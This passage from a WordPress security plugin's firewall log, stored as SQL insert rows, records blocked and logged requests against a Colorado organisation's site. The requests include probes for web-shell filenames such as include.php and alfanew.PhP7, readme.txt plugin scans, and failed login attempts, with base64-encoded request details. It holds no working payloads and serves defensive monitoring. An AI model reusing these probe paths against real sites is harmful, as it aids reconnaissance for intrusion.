Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134821,1700301118.888671,1700301118.866800,0x00000000000000000000FFFF5B5CFCA8,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-content/themes/sketch/404.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3NrZXRjaC80MDQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134822,1700301224.782189,1700301224.760400,0x00000000000000000000FFFF5B5CFCA8,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-content/plugins/core-plugin/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXBsdWdpbi9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134969,0.000000,1700484620.535558,0x00000000000000000000FFFF293A3B8A,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','http://al-zl.sk/admin/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134970,1700486177.329051,1700486177.303100,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org//wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134967,1700482750.033677,1700482750.013800,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134823,1700301211.372590,1700301211.350700,0x00000000000000000000FFFF5B5CFCA8,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-includes/images/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134824,1700301193.854894,1700301193.846100,0x00000000000000000000FFFF5B5CFCA8,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-content/plugins/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134966,1700482750.033831,1700482750.013800,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134825,1700301184.939750,1700301184.930500,0x00000000000000000000FFFF40E34E71,0,403,0,0,0,'https://eckankar-colorado.org/radio.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134826,1700301184.328213,1700301184.319000,0x00000000000000000000FFFF40E34E71,0,403,0,0,0,'https://eckankar-colorado.org/css/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nzcy9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134986,1700518032.341523,1700518032.317500,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/wp',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dw\",\"category\":\"brute-force\",\"ssl\":1}'),(134965,1700482747.203046,1700482747.178100,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org//wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134827,1700301183.413970,1700301183.404700,0x00000000000000000000FFFF40E34E71,0,403,0,0,0,'https://eckankar-colorado.org/st.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134963,1700479100.024927,1700479099.986000,0x00000000000000000000FFFFC2261647,0,403,0,0,0,'https://eckankar-colorado.org/admin/plugins/elfinder/php/connector.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L2FkbWluL3BsdWdpbnMvZWxmaW5kZXIvcGhwL2Nvbm5lY3Rvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134828,1700301182.828983,1700301182.820000,0x00000000000000000000FFFF40E34E71,0,403,0,0,0,'https://eckankar-colorado.org/cong.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134959,0.000000,1700466284.327792,0x00000000000000000000FFFF80C75146,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134960,0.000000,1700466285.502010,0x00000000000000000000FFFF80C75146,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134961,0.000000,1700466286.616885,0x00000000000000000000FFFF80C75146,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134829,1700301174.070065,1700301174.048000,0x00000000000000000000FFFF5B5CFCA8,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-includes/widgets/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134962,1700475247.671566,1700475247.614500,0x00000000000000000000FFFF14F40042,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134830,1700301156.977400,1700301156.955300,0x00000000000000000000FFFF5B5CFCA8,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-content/plugins/WordPressCore/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134831,1700301136.047540,1700301136.038500,0x00000000000000000000FFFF5B5CFCA8,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-content/themes/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134832,1700305565.273835,1700305565.251900,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/alfanew.PhP7','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFuZXcuUGhQNw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134833,1700311365.024704,1700311364.998700,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/alfanew.PhP7','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFuZXcuUGhQNw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134834,0.000000,1700316380.100354,0x00000000000000000000FFFFB8A81F24,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134835,1700316877.742106,1700316877.720500,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134956,1700457949.838116,1700457949.798400,0x00000000000000000000FFFF68FAEEEF,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/install.php',NULL,NULL,'blocked:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"path\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134836,1700316847.674011,1700316847.652300,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134957,1700461779.807448,1700461779.788600,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/hermit/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9oZXJtaXQvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9oZXJtaXQvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134837,1700316821.724635,1700316821.702600,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/WordPressCore/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134955,1700452955.431253,1700452955.390500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134838,1700316801.650285,1700316801.628400,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134839,1700316772.365008,1700316772.342100,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/sketch/404.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3NrZXRjaC80MDQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134840,1700316947.911342,1700316947.889400,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/core-plugin/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) 